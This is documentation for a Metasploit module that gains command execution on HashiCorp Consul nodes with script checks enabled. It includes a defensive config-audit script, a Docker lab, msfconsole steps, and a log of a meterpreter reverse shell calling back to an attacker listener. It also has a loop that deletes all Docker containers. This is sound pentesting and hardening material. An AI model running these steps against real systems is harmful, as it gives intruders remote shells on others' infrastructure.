metasploit-gs/documentation/modules/exploit/multi/misc/consul_service_exec.md
2018-08-10 22:45:58 +02:00

## Vulnerable Application

### Description

This module exploits HashiCorp Consul's Services API to gain remote command execution on a Consul node.

Whether the Services API is exposed in this way depends on the `enable_script_checks` option: when it is on, the agent executes the health-check scripts of services registered through the HTTP API, which is what gives the module command execution. The option is off by default and must be turned on by the node's operator.
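The following audit script is an added example for this page; it is not part of the Metasploit module or of Consul. It classifies a Consul configuration document (a config file or the `CONSUL_LOCAL_CONFIG` JSON used in the test setup) by the documented `enable_script_checks` key, shows the weak setting beside a hardened one that uses `enable_local_script_checks` (which newer Consul releases provide to accept script checks only from local config files, never over the HTTP API), and can optionally query a live agent. The live check assumes that `GET /v1/agent/self` reports the effective setting as `DebugConfig.EnableScriptChecks` / `DebugConfig.EnableLocalScriptChecks`; that field path is an assumption to verify against your Consul version.

```python
"""Audit Consul configuration for the enable_script_checks exposure.

Added example, not part of the Metasploit module or of Consul itself.
Assumed (verify for your version): GET /v1/agent/self exposes the effective
setting under DebugConfig.EnableScriptChecks / EnableLocalScriptChecks.
"""
import json
import sys
import urllib.request


def audit_config(config):
    """Classify a parsed Consul config dict (keys as documented by Consul).

    Returns:
      'exposed'    - enable_script_checks is true: anyone who can reach the
                     agent's HTTP API can register a service whose check
                     script the agent then executes (the condition this
                     module exploits).
      'local-only' - enable_local_script_checks is true: script checks are
                     accepted only from local config files, not from the API.
      'disabled'   - neither key is set (Consul's default).
    """
    if bool(config.get("enable_script_checks")):
        return "exposed"
    if bool(config.get("enable_local_script_checks")):
        return "local-only"
    return "disabled"


def audit_agent_self(agent_self):
    """Classify a GET /v1/agent/self JSON body.

    Assumption: the runtime config is reported under DebugConfig with the
    CamelCase field names below.
    """
    debug = agent_self.get("DebugConfig", {})
    if bool(debug.get("EnableScriptChecks")):
        return "exposed"
    if bool(debug.get("EnableLocalScriptChecks")):
        return "local-only"
    return "disabled"


def hardened(config):
    """Return a copy of `config` that no longer accepts script checks over HTTP.

    Script checks declared in local config files keep working through
    enable_local_script_checks; every other key is left untouched.
    """
    fixed = dict(config)
    fixed.pop("enable_script_checks", None)
    fixed["enable_local_script_checks"] = True
    return fixed


# Constructed sample: the weak setting the test-setup container is started with.
WEAK_LOCAL_CONFIG = '{"leave_on_terminate": true, "enable_script_checks":true}'


def main(argv):
    if len(argv) > 1:
        # Live mode, e.g. `python audit.py http://172.17.0.4:8500`.
        # Assumes the agent API is reachable without an ACL token.
        url = argv[1].rstrip("/") + "/v1/agent/self"
        with urllib.request.urlopen(url, timeout=5) as resp:
            print(f"{argv[1]}: script checks {audit_agent_self(json.load(resp))}")
        return
    cfg = json.loads(WEAK_LOCAL_CONFIG)
    print("weak config :", json.dumps(cfg), "->", audit_config(cfg))
    fixed = hardened(cfg)
    print("hardened    :", json.dumps(fixed), "->", audit_config(fixed))


if __name__ == "__main__":
    main(sys.argv)
```

Run it without arguments to see the weak and hardened documents side by side, or pass an agent URL to read the effective setting from a running node. A node reporting `exposed` is one this module's `check` command would also flag, so the audit doubles as a pre-check before a pentest and as a configuration-drift control afterwards.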

### References

### Test setup

The following bash script can be used to set up a testing environment with Docker:

```sh
#!/bin/sh

echo "[+] Launching consul instances..."
# Bootstrap server: first member of the cluster
docker run -d --name=consul_bootstrap_server consul agent -server -client=172.17.0.1 -bootstrap -data-dir /tmp/consul
sleep 2

# Two additional servers, each joined to the bootstrap server
docker run -d --name=consul_server_1 consul agent -server -client=172.17.0.2 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.2

docker run -d --name=consul_server_2 consul agent -server -client=172.17.0.3 -data-dir /tmp/consul
sleep 2
docker exec -t consul_bootstrap_server consul join -http-addr="172.17.0.1:8500" 172.17.0.3

# Client agent with enable_script_checks turned on: this is the vulnerable target
docker run -d -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "enable_script_checks":true}' consul agent -ui -client=172.17.0.4 -retry-join=172.17.0.1

sleep 4
echo "[+] Checking members..."
docker exec -t consul_bootstrap_server consul members -http-addr="172.17.0.1:8500"
```

You should observe something similar to the excerpt below when running the script:

```
sudo ./launch.sh
[+] Launching consul instances...
3ca869f66e7dda89f7e239a8d2ae6e477af699a20c90f2d1e2043dc90bdfa78c
fa16999754063a23687809c9dbdbabb5e8d45a54652e6e2023c67fd933d83826
Successfully joined cluster by contacting 1 nodes.
ecc11744530e63e8d9cb349e98811e2b88d67dd09a81f7a7e8fee129b72d17cf
Successfully joined cluster by contacting 1 nodes.
949d81b0c47b004d456b1db8c5452bbebe08fe99127f0bc365d417a56fada540
[+] Checking members...
Node          Address          Status  Type    Build  Protocol  DC   Segment
3ca869f66e7d  172.17.0.1:8301  alive   server  1.0.6  2         dc1  <all>
ecc11744530e  172.17.0.3:8301  alive   server  1.0.6  2         dc1  <all>
fa1699975406  172.17.0.2:8301  alive   server  1.0.6  2         dc1  <all>
949d81b0c47b  172.17.0.4:8301  alive   client  1.0.6  2         dc1  <default>
```

The following bash script stops and destroys all of your running Docker containers, not just the Consul ones, so be careful if you use Docker for other things at the same time:

```sh
#!/bin/sh
# Stop and remove every running container (the grep drops the header line)
for h in `sudo docker ps | grep -v CONTAINER | cut -d' ' -f1`; do sudo docker stop $h && sudo docker rm $h; done
```

## Verification Steps

You can verify the module against the vulnerable application with these steps:

1. Launch a Consul cluster with the provided bash script
2. Start msfconsole
3. Do: `use exploit/multi/misc/consul_service_exec`
4. Do: `set RHOST 172.17.0.4`
5. Do: `set RPORT 8500`
6. Do: `check`. The target should appear vulnerable.
7. Do: `set payload` with the payload of your choosing.
8. Do: `set LHOST 172.17.42.1` (docker0 gateway IP)
9. Do: `run`
10. You should get a shell.

## Scenarios

### Reverse shell on Linux host

Exploit running against a Docker Consul container target:

```
msf5 > use exploit/multi/misc/consul_service_exec
msf5 exploit(multi/misc/consul_service_exec) > set RHOSTS 172.17.0.4
RHOSTS => 172.17.0.4
msf5 exploit(multi/misc/consul_service_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/consul_service_exec) > set LHOST 172.17.42.1
LHOST => 172.17.42.1
msf5 exploit(multi/misc/consul_service_exec) > check
[+] 172.17.0.4:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_rexec_exec) > run

[*] Started reverse TCP handler on 172.17.42.1:4444
[*] Creating service 'BBBDX'
[*] Service 'BBBDX' successfully created.
[*] Waiting for service 'BBBDX' script to trigger
[*] Sending stage (861480 bytes) to 172.17.0.4
[*] Removing service 'BBBDX'
[*] Command Stager progress - 115.73% done (883/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.4
OS           :  (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.17.0.4 - Meterpreter session 1 closed.  Reason: User exit
```